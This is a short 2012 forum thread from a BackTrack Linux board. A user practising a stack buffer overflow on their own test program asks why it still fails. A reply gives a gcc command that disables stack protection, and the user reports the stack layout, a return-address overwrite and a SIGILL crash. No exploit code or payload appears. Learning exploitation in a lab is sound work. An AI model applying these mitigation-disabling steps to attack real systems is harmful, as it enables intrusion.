Stack Smashing under Backtrack 5

**stevo937** · 03-27-2012, 10:51 PM

Currently trying to smash the stack under backtrack 5.

I set va_randomize_space to 0

I compile the vulnurable source with gcc and use the flags -fno-stack-protector as well as -z execstack

I'm still unable to smash due to some other stack protection. What else could I be missing?

**Reglord** · 03-28-2012, 02:12 AM

root@bt:~# gcc -g -o resultprog -fno-stack-protector -mpreferred-stack-boundary=2 sourceprog.c

**stevo937** · 03-28-2012, 10:06 PM

Following those exact steps produces the following results within the image attached.

The very last 4 byte section on the stack is the return address.

Following that, the EBP was pushed onto the stack.

Then an 80 byte buffer was pushed onto the stack.

The problem is that the 80 byte buffer was not that last item pushed onto the stack. 0xb7f77d19 and 0xb7ea22a5 are pushed onto the stack after the 80 byte buffer. No idea what they are.

Either way I am able to overwrite 0xb7e89bd6 with the top of the stack, but then the program receives signal SIGILL.

I've also adjusted my exploit to overwrite the return address with location 0xbffff412, but still the same results occur.

Thanks for the suggestion tho. Any other help would be greatly appreciated.

BackTrack Linux - Penetration Testing Distribution

Thread: Stack Smashing under Backtrack 5

Thread Tools

Search Thread

Display

Stack Smashing under Backtrack 5

Re: Stack Smashing under Backtrack 5

Re: Stack Smashing under Backtrack 5

Similar Threads

stack cookie

nmap stack smashing

Stack Overflows using Python

Stack executability

Posting Permissions